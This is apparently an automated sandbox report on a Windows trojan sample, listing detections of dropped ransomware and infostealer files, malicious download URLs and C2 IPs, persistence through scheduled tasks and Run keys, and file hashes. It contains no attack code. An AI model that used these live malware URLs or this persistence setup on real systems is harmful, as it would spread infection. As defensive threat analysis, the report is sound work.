OG9rNsihJ7.exe | 49% | ReversingLabs | Win32.Trojan.Chapak
OG9rNsihJ7.exe | 100% | Joe Sandbox ML

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\3BC6.exe | 100% | Avira | HEUR/AGEN.1211353
C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\2473.exe | 100% | Avira | HEUR/AGEN.1212012
C:\Users\user\AppData\Local\Temp\6AF7.exe | 100% | Avira | HEUR/AGEN.1212012
C:\Users\user\AppData\Local\Temp\3BC6.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\FC2A.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\vfgiwcs | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\9789.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\254E.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\45AA.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\B1B2.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\8017.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2F32.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\54AF.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\BFBD.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\3136.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\88E2.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7808.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\3A7E.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\3BC6.exe | 46% | Metadefender
C:\Users\user\AppData\Local\Temp\3BC6.exe | 89% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\45AA.exe | 34% | Metadefender
C:\Users\user\AppData\Local\Temp\45AA.exe | 77% | ReversingLabs | Win32.Ransomware.StopCrypt
C:\Users\user\AppData\Local\Temp\54AF.exe | 50% | ReversingLabs | Win32.Infostealer.Generic
C:\Users\user\AppData\Local\Temp\8017.exe | 35% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx

                      Unpacked PE Files

Source | Detection | Scanner | Label
30.0.3BC6.exe.650000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
30.0.3BC6.exe.650000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
20.0.B1B2.exe.2080e50.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
45.0.3BC6.exe.3c0000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
1.1.OG9rNsihJ7.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.1.vfgiwcs.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
45.0.3BC6.exe.3c0000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
28.2.254E.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.OG9rNsihJ7.exe.5f15a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
28.3.254E.exe.7f0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
19.2.vfgiwcs.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
42.2.xqfkdfcl.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
29.2.3136.exe.6c0e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
30.2.3BC6.exe.650000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
19.0.vfgiwcs.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
29.3.3136.exe.7f0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
20.0.B1B2.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
22.2.BFBD.exe.6c15a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
45.0.3BC6.exe.3c0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
1.2.OG9rNsihJ7.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
45.0.3BC6.exe.3c0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
20.0.B1B2.exe.2080e50.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
45.0.3BC6.exe.400000.8.unpack | 100% | Avira | HEUR/AGEN.1145065
1.0.OG9rNsihJ7.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
24.0.BFBD.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.OG9rNsihJ7.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
30.0.3BC6.exe.650000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
19.0.vfgiwcs.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.OG9rNsihJ7.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
45.0.3BC6.exe.400000.7.unpack | 100% | Avira | HEUR/AGEN.1145065
24.1.BFBD.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
20.0.B1B2.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
24.2.BFBD.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
24.0.BFBD.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
42.3.xqfkdfcl.exe.7f0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
19.0.vfgiwcs.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
44.2.svchost.exe.7b0000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
45.2.3BC6.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1145065
45.0.3BC6.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1145065
20.2.B1B2.exe.2080e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
28.2.254E.exe.6c0e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
45.0.3BC6.exe.400000.5.unpack | 100% | Avira | HEUR/AGEN.1145065
29.2.3136.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
42.2.xqfkdfcl.exe.840000.2.unpack | 100% | Avira | BDS/Backdoor.Gen
45.0.3BC6.exe.400000.6.unpack | 100% | Avira | HEUR/AGEN.1145065
18.2.vfgiwcs.6415a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
24.0.BFBD.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
20.2.B1B2.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
42.2.xqfkdfcl.exe.680e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
20.3.B1B2.exe.2090000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
30.0.3BC6.exe.650000.0.unpack | 100% | Avira | HEUR/AGEN.1211353

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://81.163.30.181/l2.exe | 100% | Avira URL Cloud | malware
http://185.7.214.171:8080/6.php | 100% | URL Reputation | malware
http://host-data-coin-11.com/ | 0% | URL Reputation | safe
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | 100% | Avira URL Cloud | malware
http://data-host-coin-8.com/game.exe | 0% | URL Reputation | safe
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
https://api.ip.sb/ip | 0% | URL Reputation | safe
http://unicupload.top/install5.exe | 100% | URL Reputation | phishing
http://74.201.28.62/book/KB5009812.png | 0% | Avira URL Cloud | safe
http://schemas.microsoft. | 0% | URL Reputation | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe | 100% | Avira URL Cloud | malware
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
http://74.201.28.62/book/KB5009812.exe | 0% | Avira URL Cloud | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
http://data-host-coin-8.com/files/7729_1642101604_1835.exe | 100% | Avira URL Cloud | malware
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | 100% | Avira URL Cloud | malware
https://dynamic.t | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
http://81.163.30.181/l3.exe | 100% | Avira URL Cloud | malware
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
github.com | 140.82.121.4 | true | false | | high
patmushta.info | 94.142.143.116 | true | false | | high
raw.githubusercontent.com | 185.199.108.133 | true | false | | high
cdn.discordapp.com | 162.159.133.233 | true | false | | high
ipwhois.app | 136.243.172.101 | true | false | | high
unicupload.top | 54.38.220.85 | true | false | | high
host-data-coin-11.com | 8.209.70.0 | true | false | | high
c9d0e790b353537889bd47a364f5acff43c11f248.xyz | 185.112.83.97 | true | false | | high
privacy-tools-for-you-780.com | 8.209.70.0 | true | false | | high
microsoft-com.mail.protection.outlook.com | 40.93.207.0 | true | false | | high
goo.su | 172.67.139.105 | true | false | | high
transfer.sh | 144.76.136.153 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
data-host-coin-8.com | 8.209.70.0 | true | false | | high
api.ip.sb | unknown | unknown | false | | high

                                                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://81.163.30.181/l2.exe | true | Avira URL Cloud: malware | unknown
http://185.7.214.171:8080/6.php | true | URL Reputation: malware | unknown
http://host-data-coin-11.com/ | false | URL Reputation: safe | unknown
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/game.exe | false | URL Reputation: safe | unknown
http://unicupload.top/install5.exe | true | URL Reputation: phishing | unknown
http://74.201.28.62/book/KB5009812.png | true | Avira URL Cloud: safe | unknown
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe | true | Avira URL Cloud: malware | unknown
http://74.201.28.62/book/KB5009812.exe | true | Avira URL Cloud: safe | unknown
http://data-host-coin-8.com/files/7729_1642101604_1835.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | true | Avira URL Cloud: malware | unknown
http://81.163.30.181/l3.exe | true | Avira URL Cloud: malware | unknown

                                                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://t0.tiles.ditu.live.com/tiles/gen19 | svchost.exe, 0000000A.00000002.308686012.0000021A33242000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305057096.0000021A33241000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/ | svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 0000000A.00000002.308686012.0000021A33242000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305057096.0000021A33241000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 0000000A.00000002.308686012.0000021A33242000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305057096.0000021A33241000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmp | false | | high
http://www.bingmapsportal.com | svchost.exe, 0000000A.00000002.308487293.0000021A33224000.00000004.00000001.sdmp | false | | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmp | false | | high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmp | false | | high
https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.ip.sb/ip | 3BC6.exe, 0000001E.00000002.412827478.0000000003991000.00000004.00000001.sdmp, 3BC6.exe, 0000002D.00000000.408848131.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 0000000A.00000003.305050188.0000021A33256000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Transit/Stops/ | svchost.exe, 0000000A.00000003.304930787.0000021A33268000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.308781800.0000021A3326A000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmp | false | | high
http://schemas.microsoft. | svchost.exe, 00000007.00000002.536270929.000002A7E56AB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.ver) | svchost.exe, 00000007.00000002.554990269.000002A7EAC62000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000002.430423414.00000137968EB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmp | false | | high
https://www.tiktok.com/legal/report/feedback | svchost.exe, 0000002F.00000003.407630101.00000137971A4000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407734160.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407790447.0000013797602000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407773416.000001379718D000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407700908.00000137971A4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 0000000A.00000002.308487293.0000021A33224000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmp | false | | high
https://%s.xboxlive.com | svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 0000000A.00000002.308706855.0000021A3324D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305040244.0000021A33246000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmp | false | | high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmp | false | | high
https://www.disneyplus.com/legal/privacy-policy | svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmp | false | | high
https://dynamic.t | svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmp | false | | high
https://disneyplus.com/legal. | svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.308656175.0000021A3323A000.00000004.00000001.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmp | false | | high
https://activity.windows.com | svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmp | false | | high
http://help.disneyplus.com. | svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://%s.dnet.xboxlive.com | svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmp | false | | high

                                                                                                                      Contacted IPs

                                                                                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
40.93.207.0 | microsoft-com.mail.protection.outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
94.142.143.116 | patmushta.info | Russian Federation | 35196 | IHOR-ASRU | false
188.166.28.199 | unknown | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true
172.67.139.105 | goo.su | United States | 13335 | CLOUDFLARENETUS | false
74.201.28.62 | unknown | United States | 35913 | DEDIPATH-LLCUS | true
8.209.70.0 | host-data-coin-11.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
54.38.220.85 | unicupload.top | France | 16276 | OVHFR | false
162.159.133.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
144.76.136.153 | transfer.sh | Germany | 24940 | HETZNER-ASDE | false
81.163.30.181 | unknown | Russian Federation | 58303 | IR-RASANAPISHTAZIR | false
185.233.81.115 | unknown | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | true
185.7.214.171 | unknown | France | 42652 | DELUNETDE | true
185.186.142.166 | unknown | Russian Federation | 204490 | ASKONTELRU | true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553412
Start date: 14.01.2022
Start time: 21:03:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 35s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: OG9rNsihJ7.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 48
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@60/37@100/15
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 23.5% (good quality ratio 16.1%)
• Quality average: 52.1%
• Quality standard deviation: 40.6%
HCA Information:
• Successful, ratio: 58%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• TCP Packets have been reduced to 100
• Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.35.236.56, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 104.208.16.94, 20.54.110.249, 20.42.73.29, 104.26.13.31, 104.26.12.31, 172.67.75.172
• Excluded domains from analysis (whitelisted): client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, iplogger.org, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, microsoft.com, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing behavior and disassembly information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: OG9rNsihJ7.exe

Simulations

Behavior and APIs

Time      Type             Description
21:04:25  API Interceptor  10x Sleep call for process: svchost.exe modified
21:04:56  Task Scheduler   Run new task: Firefox Default Browser Agent B300E2CA9C9656AE path: C:\Users\user\AppData\Roaming\vfgiwcs
21:05:11  API Interceptor  1x Sleep call for process: 254E.exe modified
21:05:29  API Interceptor  1x Sleep call for process: WerFault.exe modified
21:05:55  API Interceptor  1x Sleep call for process: explorer.exe modified
21:06:32  Autostart        Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RegHost C:\Users\user\AppData\Roaming\Microsoft\RegHost.exe
21:06:34  Task Scheduler   Run new task: Telemetry Logging path: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
21:06:52  Task Scheduler   Run new task: services path: C:\Users\user\AppData\Roaming\Microsoft\services.exe

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log
Process: C:\Windows\System32\svchost.exe
File Type: MPEG-4 LOAS
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.24860094463598098
Encrypted: false
SSDEEP: 1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4P:BJiRdwfu2SRU4P
MD5: C9689D25BCB7A6122C80D8D1248CD525
SHA1: 3626F8C656E1F3524CD70D2C237FBDC25AF8C26B
SHA-256: A1B6750BEA5C766B4AC8A6D65695475180388153C3504BBBA66053A8BB3F9014
SHA-512: 1B132DCA5A85A0B510A84117A7F8CEEB2AD4591C24EFA651D6E39B2D94140F4D37E30DFBDC4A860D661E54188703ABD742AA3153ED9B6EEECEB0E16FA093D14F
Malicious: false
Reputation: unknown
                                                                                                                      Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x962e81fb, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 786432
Entropy (8bit): 0.2506309986392212
Encrypted: false
SSDEEP: 384:M+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:TSB2nSB2RSjlK/+mLesOj1J2
MD5: AEF5940564973C51F03B64B3BF5DAF42
SHA1: B5A630CEDB208FCF5DE3E8C4EE6C1ECE9AC50644
SHA-256: 03AD212E8D9030DB0C6C1AE6B3C3560681FB1C5DC012CC75FECC751E81C39F6A
SHA-512: B91EB9A7ACB63185D5304A2AEF6CEB973AD4F7C031BDB6BB51CECAF7A44AE1B44CC83DD2A9EA92051188AE0FA67FEF65D3B5C15F162EAFB5C400D0E6720FF44F
Malicious: false
Reputation: unknown
                                                                                                                      Preview: ....... ................e.f.3...w........................&..........w.......z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................k..t.....z...................iQ......z..........................................................................................................................................................................................................................................................................................................................................................................................
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07533799262335537
Encrypted: false
SSDEEP: 3:rftl7Ev/2ff4lkl/bJdAtiX0/gqkf4l1all3Vkttlmlnl:DXinkt4ztQ3
MD5: 2107023193542ECC0970CB79A0C9E236
SHA1: F5D4FD1244E423620174644F19B9F4C484DCA0A5
SHA-256: 9B5F9895367FCB9497C1DA993C21C355AA6937BF3FD1FD719E08EAAF905BCDD4
SHA-512: 1DA7C4DB4F8D644D2EADBE475EC111B408697B2E974C5943C9A1AD4230C0C57451AC5B0CCEC2F97C1E4C93D15CC2C2D291ECA6BDC40AD7574CBFC75959A3D929
Malicious: false
Reputation: unknown
                                                                                                                      Preview: .1'......................................3...w.......z.......w...............w.......w....:O.....w...................iQ......z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_B1B2.exe_97263ecc359653bdc088fc4542e7f7e1a086af1b_57588827_1b13b61d\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.8138460270665933
Encrypted: false
SSDEEP: 96:zvFmoP1pgLnCDyaC9OQoJ7R3V6tpXIQcQec6tycEfcw3qhz+HbHg/8BRTf3o8Fa7:zvP1pKC+q8HQ0lLjIq/u7sZS274Itvu
MD5: A718EF39D4118C87DFC94920D817BDB7
SHA1: 1C873AFB51135338D4F94B5A7F259BC0D7874793
SHA-256: D295541AB8373183E475D1A7780D51C4C8AFEA49D4ECEA63F440B98656873954
